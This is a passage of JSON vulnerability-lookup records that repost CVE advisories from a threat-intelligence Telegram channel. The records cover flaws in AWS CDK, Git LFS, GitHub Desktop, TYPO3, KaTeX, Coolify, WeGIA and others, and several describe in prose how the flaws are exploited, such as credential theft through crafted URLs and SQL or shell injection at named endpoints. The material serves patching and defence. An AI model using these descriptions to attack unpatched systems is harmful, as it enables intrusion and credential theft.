https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQQ4E3JBXVR3VK5FIZVJ3QS2TAOOXXTQ\n6. https://www.benthamsgaze.org/2022/08/22/vulnerability-in-linux-containers-investigation-and-mitigation", "creation_timestamp": "2025-01-17T13:56:48.000000Z"}, {"uuid": "740cea18-0c98-4446-b638-a36c19e3fdda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V4MQ-X674-FF73", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2200", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23206\n\ud83d\udd39 Description: The AWS Cloud Development Kit (AWS CDK) is an open-source software development framework to define cloud infrastructure in code and provision it through AWS CloudFormation. Users who use IAM OIDC custom resource provider package will download CA Thumbprints as part of the custom resource workflow. However, the current `tls.connect` method will always set `rejectUnauthorized: false` which is a potential security concern. CDK should follow the best practice and set `rejectUnauthorized: true`. However, this could be a breaking change for existing CDK applications and we should fix this with a feature flag. Note that this is marked as low severity Security advisory because the issuer url is provided by CDK users who define the CDK application. If they insist on connecting to a unauthorized OIDC provider, CDK should not disallow this. Additionally, the code block is run in a Lambda environment which mitigate the MITM attack. The patch is in progress. To mitigate, upgrade to CDK v2.177.0 (Expected release date 2025-02-22). Once upgraded, users should make sure the feature flag '@aws-cdk/aws-iam:oidcRejectUnauthorizedConnections' is set to true in `cdk.context.json` or `cdk.json`. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-17T20:34:50.851Z\n\ud83d\udccf Modified: 2025-01-17T20:34:50.851Z\n\ud83d\udd17 References:\n1. https://github.com/aws/aws-cdk/security/advisories/GHSA-v4mq-x674-ff73\n2. https://github.com/aws/aws-cdk/issues/32920\n3. https://github.com/aws/aws-cdk/blob/d16482fc8a4a3e1f62751f481b770c09034df7d2/packages/%40aws-cdk/custom-resource-handlers/lib/aws-iam/oidc-handler/external.ts#L34", "creation_timestamp": "2025-01-17T20:57:42.000000Z"}, {"uuid": "bf495ad3-b9d2-4488-9c11-bcf6aae7858a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q6R2-X2CC-VRP7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1767", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-53263\n\ud83d\udd39 Description: Git LFS is a Git extension for versioning large files. When Git LFS requests credentials from Git for a remote host, it passes portions of the host's URL to the `git-credential(1)` command without checking for embedded line-ending control characters, and then sends any credentials it receives back from the Git credential helper to the remote host. By inserting URL-encoded control characters such as line feed (LF) or carriage return (CR) characters into the URL, an attacker may be able to retrieve a user's Git credentials. This problem exists in all previous versions and is patched in v3.6.1. All users should upgrade to v3.6.1. There are no workarounds known at this time.\n\ud83d\udccf Published: 2025-01-14T19:33:21.876Z\n\ud83d\udccf Modified: 2025-01-15T14:55:48.695Z\n\ud83d\udd17 References:\n1. https://github.com/git-lfs/git-lfs/security/advisories/GHSA-q6r2-x2cc-vrp7\n2. https://github.com/git-lfs/git-lfs/commit/0345b6f816e611d050c0df67b61f0022916a1c90\n3. https://github.com/git-lfs/git-lfs/releases/tag/v3.6.1", "creation_timestamp": "2025-01-15T15:10:43.000000Z"}, {"uuid": "40a61917-87c3-4bc8-ba19-df5b7e390035", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4G52-PQ8J-6QV5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1776", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-55921\n\ud83d\udd39 Description: TYPO3 is a free and open source Content Management Framework. A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP GET and did not enforce the appropriate HTTP method. Successful exploitation of this vulnerability requires the victim to have an active session on the backend user interface and to be deceived into interacting with a malicious URL targeting the backend, which can occur under the following conditions: The user opens a malicious link, such as one sent via email. The user visits a compromised or manipulated website while the following settings are misconfigured: 1. `security.backend.enforceReferrer` feature is disabled, 2. `BE/cookieSameSite` configuration is set to lax or none. The vulnerability in the affected downstream component \u201cExtension Manager Module\u201d allows attackers to retrieve and install 3rd party extensions from the TYPO3 Extension Repository - which can lead to remote code execution in the worst case. Users are advised to update to TYPO3 versions 11.5.42 ELTS, 12.4.25 LTS, 13.4.3 LTS which fix the problem described.\n\ud83d\udccf Published: 2025-01-14T19:36:32.439Z\n\ud83d\udccf Modified: 2025-01-15T15:49:28.970Z\n\ud83d\udd17 References:\n1. https://github.com/TYPO3/typo3/security/advisories/GHSA-4g52-pq8j-6qv5\n2. https://typo3.org/security/advisory/typo3-core-sa-2025-006", "creation_timestamp": "2025-01-15T15:55:02.000000Z"}, {"uuid": "d6bb519d-f101-4c7d-9903-a697709d3c7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P9QP-C452-F9R7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1788", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-39374\n\ud83d\udd39 Description: Synapse is an open-source Matrix homeserver written and maintained by the Matrix.org Foundation. If Synapse and a malicious homeserver are both joined to the same room, the malicious homeserver can trick Synapse into accepting previously rejected events into its view of the current state of that room. This can be exploited in a way that causes all further messages and state changes sent in that room from the vulnerable homeserver to be rejected. This issue has been patched in version 1.68.0\n\n\n\ud83d\udccf Published: 2023-05-26T13:44:44.113Z\n\ud83d\udccf Modified: 2025-01-15T15:34:02.534Z\n\ud83d\udd17 References:\n1. https://github.com/matrix-org/synapse/security/advisories/GHSA-p9qp-c452-f9r7\n2. https://github.com/matrix-org/synapse/pull/13723\n3. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UJIJRP5ZH6B3KGFLHCAKR2IX2Y4Z25QD/", "creation_timestamp": "2025-01-15T15:55:18.000000Z"}, {"uuid": "d6954386-cb11-428c-bbc1-acde479703bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7JJC-GG6M-3329", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1810", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-52005\n\ud83d\udd39 Description: Git is a source code management tool. When cloning from a server (or fetching, or pushing), informational or error messages are transported from the remote Git process to the client via the so-called \"sideband channel\". These messages will be prefixed with \"remote:\" and printed directly to the standard error output. Typically, this standard error output is connected to a terminal that understands ANSI escape sequences, which Git did not protect against. Most modern terminals support control sequences that can be used by a malicious actor to hide and misrepresent information, or to mislead the user into executing untrusted scripts. As requested on the git-security mailing list, the patches are under discussion on the public mailing list. Users are advised to update as soon as possible. Users unable to upgrade should avoid recursive clones unless they are from trusted sources.\n\ud83d\udccf Published: 2025-01-15T17:35:02.379Z\n\ud83d\udccf Modified: 2025-01-15T17:35:02.379Z\n\ud83d\udd17 References:\n1. https://github.com/git/git/security/advisories/GHSA-7jjc-gg6m-3329\n2. https://lore.kernel.org/git/1M9FnZ-1taoNo1wwh-00ESSd@mail.gmx.net", "creation_timestamp": "2025-01-15T17:54:46.000000Z"}, {"uuid": "b68ef7d4-6f43-4a21-88fc-f6df453051af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-36MM-RH9Q-CPQQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1812", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23040\n\ud83d\udd39 Description: GitHub Desktop is an open-source Electron-based GitHub app designed for git development. An attacker convincing a user to clone a repository directly or through a submodule can allow the attacker access to the user's credentials through the use of maliciously crafted remote URL. GitHub Desktop relies on Git to perform all network related operations (such as cloning, fetching, and pushing). When a user attempts to clone a repository GitHub Desktop will invoke `git clone` and when Git encounters a remote which requires authentication it will request the credentials for that remote host from GitHub Desktop using the git-credential protocol. Using a maliciously crafted URL it's possible to cause the credential request coming from Git to be misinterpreted by Github Desktop such that it will send credentials for a different host than the host that Git is currently communicating with thereby allowing for secret exfiltration. GitHub username and OAuth token, or credentials for other Git remote hosts stored in GitHub Desktop could be improperly transmitted to an unrelated host. Users should update to GitHub Desktop 3.4.12 or greater which fixes this vulnerability. Users who suspect they may be affected should revoke any relevant credentials.\n\ud83d\udccf Published: 2025-01-15T17:25:00.945Z\n\ud83d\udccf Modified: 2025-01-15T17:25:00.945Z\n\ud83d\udd17 References:\n1. https://github.com/desktop/desktop/security/advisories/GHSA-36mm-rh9q-cpqq\n2. https://docs.github.com/en/apps/using-github-apps/reviewing-and-revoking-authorization-of-github-apps\n3. https://git-scm.com/docs/git-credential", "creation_timestamp": "2025-01-15T17:54:47.000000Z"}, {"uuid": "00134d37-9afc-4fac-8f3f-cc55d256bb74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CM7W-99V2-PRRQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2211", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23202\n\ud83d\udd39 Description: Bible Module is a tool designed for ROBLOX developers to integrate Bible functionality into their games. The `FetchVerse` and `FetchPassage` functions in the Bible Module are susceptible to injection attacks due to the absence of input validation. This vulnerability could allow an attacker to manipulate the API request URLs, potentially leading to unauthorized access or data tampering. This issue has been addressed in version 0.0.3. All users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-17T20:18:20.352Z\n\ud83d\udccf Modified: 2025-01-17T20:18:20.352Z\n\ud83d\udd17 References:\n1. https://github.com/devycreates/Bible-Module/security/advisories/GHSA-cm7w-99v2-prrq\n2. https://github.com/devycreates/Bible-Module/commit/5b783855fc3285be2da8639c97ac37af28f8c55a", "creation_timestamp": "2025-01-17T20:57:56.000000Z"}, {"uuid": "dae6a503-e350-46f5-97ec-8e344667758b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7PQ6-V88G-WF3W", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1854", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22146\n\ud83d\udd39 Description: Sentry is a developer-first error tracking and performance monitoring tool. A critical vulnerability was discovered in the SAML SSO implementation of Sentry. It was reported to us via our private bug bounty program. The vulnerability allows an attacker to take over any user account by using a malicious SAML Identity Provider and another organization on the same Sentry instance. The victim email address must be known in order to exploit this vulnerability. The Sentry SaaS fix was deployed on Jan 14, 2025. For self hosted users; if only a single organization is allowed `(SENTRY_SINGLE_ORGANIZATION = True)`, then no action is needed. Otherwise, users should upgrade to version 25.1.0 or higher. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-15T19:57:59.734Z\n\ud83d\udccf Modified: 2025-01-15T20:44:47.931Z\n\ud83d\udd17 References:\n1. https://github.com/getsentry/sentry/security/advisories/GHSA-7pq6-v88g-wf3w\n2. https://github.com/getsentry/sentry/pull/83407", "creation_timestamp": "2025-01-15T20:54:50.000000Z"}, {"uuid": "8aa985f3-cc4b-44f2-a558-7a2a0e730b1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4CCH-WXPW-8P28", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1866", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2020-26258\n\ud83d\udd39 Description: XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.15, a Server-Side Forgery Request vulnerability can be activated when unmarshalling. The vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.15. The reported vulnerability does not exist if running Java 15 or higher. No user is affected who followed the recommendation to setup XStream's Security Framework with a whitelist! Anyone relying on XStream's default blacklist can immediately switch to a whilelist for the allowed types to avoid the vulnerability. Users of XStream 1.4.14 or below who still want to use XStream default blacklist can use a workaround described in more detailed in the referenced advisories.\n\ud83d\udccf Published: 2020-12-16T01:05:22\n\ud83d\udccf Modified: 2025-01-15T20:20:17.971Z\n\ud83d\udd17 References:\n1. https://github.com/x-stream/xstream/security/advisories/GHSA-4cch-wxpw-8p28\n2. https://lists.apache.org/thread.html/r97993e3d78e1f5389b7b172ba9f308440830ce5f051ee62714a0aa34@%3Ccommits.struts.apache.org%3E\n3. https://lists.debian.org/debian-lts-announce/2020/12/msg00042.html\n4. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP\n5. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7\n6. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB\n7. https://security.netapp.com/advisory/ntap-20210409-0005\n8. https://www.debian.org/security/2021/dsa-4828\n9. https://x-stream.github.io/CVE-2020-26258.html", "creation_timestamp": "2025-01-15T20:55:06.000000Z"}, {"uuid": "24de06d1-68bb-4623-9732-e6c222233793", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C6X3-V7HQ-94WF", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3129", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-c6x3-v7hq-94wf\n\ud83d\udd25 CVSS Score: N/A (CVSS_V3)\n\ud83d\udd39 Description: The Multiple Page Generator Plugin \u2013 MPG plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.0.5 via the 'mpg_download_file_by_link' function. This makes it possible for authenticated attackers, with editor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.\n\ud83d\udccf Published: 2025-01-26T09:30:31Z\n\ud83d\udccf Modified: 2025-01-26T09:30:31Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-10705\n2. https://plugins.trac.wordpress.org/changeset/3205550/multiple-pages-generator-by-porthas\n3. https://www.wordfence.com/threat-intel/vulnerabilities/id/7b3446e5-ca01-4468-927a-86e951e662ab?source=cve", "creation_timestamp": "2025-01-26T10:06:17.000000Z"}, {"uuid": "6ebd4858-25fd-4e2e-8212-ae99b50458b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G84X-G96G-RCJC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2077", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23201\n\ud83d\udd39 Description: librenms is a community-based GPL-licensed network monitoring system. Affected versions are subject to Cross-site Scripting (XSS) on the parameters:`/addhost` -&gt; param: community. Librenms versions up to 24.10.1 allow remote attackers to inject malicious scripts. When a user views or interacts with the page displaying the data, the malicious script executes immediately, leading to potential unauthorized actions or data exposure. This issue has been addressed in release version 24.11.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-16T22:18:51.754Z\n\ud83d\udccf Modified: 2025-01-16T22:18:51.754Z\n\ud83d\udd17 References:\n1. https://github.com/librenms/librenms/security/advisories/GHSA-g84x-g96g-rcjc", "creation_timestamp": "2025-01-16T22:56:33.000000Z"}, {"uuid": "5bd24d09-bd33-42ff-b56c-71a87fc59016", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CCP8-V65G-M526", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2926", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22606\n\ud83d\udd39 Description: Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. In version 4.0.0-beta.358 and possibly earlier versions, when creating or updating a \"project,\" it is possible to inject arbitrary shell commands by altering the project name. If a name includes unescaped characters, such as single quotes (`'`), it breaks out of the intended command structure, allowing attackers to execute arbitrary commands on the host system. This vulnerability allows attackers to execute arbitrary commands on the host server, which could result in full system compromise; create, modify, or delete sensitive system files; and escalate privileges depending on the permissions of the executed process. Attackers with access to project management features could exploit this flaw to gain unauthorized control over the host environment. Version 4.0.0-beta.359 fixes this issue.\n\ud83d\udccf Published: 2025-01-24T15:38:47.352Z\n\ud83d\udccf Modified: 2025-01-24T15:40:44.749Z\n\ud83d\udd17 References:\n1. https://github.com/coollabsio/coolify/security/advisories/GHSA-ccp8-v65g-m526", "creation_timestamp": "2025-01-24T16:04:50.000000Z"}, {"uuid": "e31b18bd-e0bf-495a-84e0-0301702e5339", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CG87-WMX4-V546", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2224", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23207\n\ud83d\udd39 Description: KaTeX is a fast, easy-to-use JavaScript library for TeX math rendering on the web. KaTeX users who render untrusted mathematical expressions with `renderToString` could encounter malicious input using `\\htmlData` that runs arbitrary JavaScript, or generate invalid HTML. Users are advised to upgrade to KaTeX v0.16.21 to remove this vulnerability. Users unable to upgrade should avoid use of or turn off the `trust` option, or set it to forbid `\\htmlData` commands, forbid inputs containing the substring `\"\\\\htmlData\"` and sanitize HTML output from KaTeX.\n\ud83d\udccf Published: 2025-01-17T21:25:05.746Z\n\ud83d\udccf Modified: 2025-01-17T21:32:24.984Z\n\ud83d\udd17 References:\n1. https://github.com/KaTeX/KaTeX/security/advisories/GHSA-cg87-wmx4-v546\n2. https://github.com/KaTeX/KaTeX/commit/ff289955e81aab89086eef09254cbf88573d415c", "creation_timestamp": "2025-01-17T21:56:59.000000Z"}, {"uuid": "a193e8b7-b7f5-4c20-9172-71ed51c8d3b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C9P4-XWR9-RFHX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2235", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23208\n\ud83d\udd39 Description: zot is a production-ready vendor-neutral OCI image registry. The group data stored for users in the boltdb database (meta.db) is an append-list so group revocations/removals are ignored in the API. SetUserGroups is alled on login, but instead of replacing the group memberships, they are appended. This may be due to some conflict with the group definitions in the config file, but that wasn't obvious to me if it were the case. Any Zot configuration that relies on group-based authorization will not respect group remove/revocation by an IdP. This issue has been addressed in version 2.1.2. All users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-17T22:24:09.406Z\n\ud83d\udccf Modified: 2025-01-17T22:24:09.406Z\n\ud83d\udd17 References:\n1. https://github.com/project-zot/zot/security/advisories/GHSA-c9p4-xwr9-rfhx\n2. https://github.com/project-zot/zot/commit/002ac62d8a15bf0cba010b3ba7bde86f9837b613\n3. https://github.com/project-zot/zot/blob/5e30fec65c49e3139907e2819ccb39b2e3bd784e/pkg/meta/boltdb/boltdb.go#L1665", "creation_timestamp": "2025-01-17T22:57:00.000000Z"}, {"uuid": "6cfc55e5-3264-461a-b12b-30293a682304", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0041", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2355", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-0874\n\ud83d\udd39 Description: A flaw was found in coredns. This issue could lead to invalid cache entries returning due to incorrectly implemented caching.\n\ud83d\udccf Published: 2024-04-25T16:22:44.182Z\n\ud83d\udccf Modified: 2025-01-20T09:24:54.659Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0041\n2. https://access.redhat.com/errata/RHSA-2024:4850\n3. https://access.redhat.com/errata/RHSA-2024:6009\n4. https://access.redhat.com/errata/RHSA-2024:6406\n5. https://access.redhat.com/security/cve/CVE-2024-0874\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2219234\n7. https://github.com/coredns/coredns/issues/6186\n8. https://github.com/coredns/coredns/pull/6354", "creation_timestamp": "2025-01-20T09:59:36.000000Z"}, {"uuid": "f0d6b54b-aa78-49e3-825b-434ead0df536", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6406", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2355", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-0874\n\ud83d\udd39 Description: A flaw was found in coredns. This issue could lead to invalid cache entries returning due to incorrectly implemented caching.\n\ud83d\udccf Published: 2024-04-25T16:22:44.182Z\n\ud83d\udccf Modified: 2025-01-20T09:24:54.659Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0041\n2. https://access.redhat.com/errata/RHSA-2024:4850\n3. https://access.redhat.com/errata/RHSA-2024:6009\n4. https://access.redhat.com/errata/RHSA-2024:6406\n5. https://access.redhat.com/security/cve/CVE-2024-0874\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2219234\n7. https://github.com/coredns/coredns/issues/6186\n8. https://github.com/coredns/coredns/pull/6354", "creation_timestamp": "2025-01-20T09:59:36.000000Z"}, {"uuid": "6d1a544d-4c1d-4df0-839d-810f93799b6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6009", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2355", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-0874\n\ud83d\udd39 Description: A flaw was found in coredns. This issue could lead to invalid cache entries returning due to incorrectly implemented caching.\n\ud83d\udccf Published: 2024-04-25T16:22:44.182Z\n\ud83d\udccf Modified: 2025-01-20T09:24:54.659Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0041\n2. https://access.redhat.com/errata/RHSA-2024:4850\n3. https://access.redhat.com/errata/RHSA-2024:6009\n4. https://access.redhat.com/errata/RHSA-2024:6406\n5. https://access.redhat.com/security/cve/CVE-2024-0874\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2219234\n7. https://github.com/coredns/coredns/issues/6186\n8. https://github.com/coredns/coredns/pull/6354", "creation_timestamp": "2025-01-20T09:59:36.000000Z"}, {"uuid": "69006e32-2eaf-4eaa-a451-6b17b2c9ccb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2RHX-QHXP-5JPW", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/2354", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-5042\n\ud83d\udd39 Description: A flaw was found in the Submariner project. Due to unnecessary role-based access control permissions, a privileged attacker can run a malicious container on a node that may allow them to steal service account tokens and further compromise other nodes and potentially the entire cluster.\n\ud83d\udccf Published: 2024-05-17T13:12:00.551Z\n\ud83d\udccf Modified: 2025-01-20T08:33:53.439Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4591\n2. https://access.redhat.com/security/cve/CVE-2024-5042\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2280921\n4. https://github.com/advisories/GHSA-2rhx-qhxp-5jpw", "creation_timestamp": "2025-01-20T08:59:25.000000Z"}, {"uuid": "1cde7b92-27a7-47eb-a779-3e0d78936932", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-425J-H4CF-G52J", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2363", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23220\n\ud83d\udd39 Description: WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A SQL Injection vulnerability was identified in the WeGIA application, specifically in the adicionar_raca.php endpoint. This vulnerability allows attackers to execute arbitrary SQL commands in the database, allowing unauthorized access to sensitive information. During the exploit, it was possible to perform a complete dump of the application's database, highlighting the severity of the flaw. This vulnerability is fixed in 3.2.10.\n\ud83d\udccf Published: 2025-01-20T15:48:36.049Z\n\ud83d\udccf Modified: 2025-01-20T15:48:36.049Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-425j-h4cf-g52j\n2. https://github.com/LabRedesCefetRJ/WeGIA/commit/1739e1589948a207b8a82b9bfe078cb826d420de", "creation_timestamp": "2025-01-20T16:01:42.000000Z"}, {"uuid": "87f60c19-c8d2-45c3-93e9-4b5a78e7afc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9V2V-JXVW-52RQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2366", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23044\n\ud83d\udd39 Description: PwnDoc is a penetration test report generator. There is no CSRF protection in pwndoc, allowing attackers to send requests on a logged-in user's behalf. This includes GET and POST requests due to the missing SameSite= attribute on cookies and the ability to refresh cookies. Commit 14acb704891245bf1703ce6296d62112e85aa995 patches the issue.\n\ud83d\udccf Published: 2025-01-20T15:43:23.882Z\n\ud83d\udccf Modified: 2025-01-20T15:43:23.882Z\n\ud83d\udd17 References:\n1. https://github.com/pwndoc/pwndoc/security/advisories/GHSA-9v2v-jxvw-52rq\n2. https://github.com/pwndoc/pwndoc/commit/14acb704891245bf1703ce6296d62112e85aa995", "creation_timestamp": "2025-01-20T16:01:44.000000Z"}, {"uuid": "3b70788e-4226-43d1-8767-29063f8b30d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XHV4-88GX-HVGH", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2365", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23218\n\ud83d\udd39 Description: WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A SQL Injection vulnerability was identified in the WeGIA application, specifically in the adicionar_especie.php endpoint. This vulnerability allows attackers to execute arbitrary SQL commands in the database, allowing unauthorized access to sensitive information. During the exploit, it was possible to perform a complete dump of the application's database, highlighting the severity of the flaw. This vulnerability is fixed in 3.2.10.\n\ud83d\udccf Published: 2025-01-20T15:45:52.680Z\n\ud83d\udccf Modified: 2025-01-20T15:45:52.680Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xhv4-88gx-hvgh\n2. https://github.com/LabRedesCefetRJ/WeGIA/commit/7465f785651c0cff65059bba96b015ab54235de4", "creation_timestamp": "2025-01-20T16:01:44.000000Z"}, {"uuid": "d0265a24-f58c-4858-9978-e2da64340b46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PMF4-V838-29HG", "type": "published-proof-of-concept", "source": 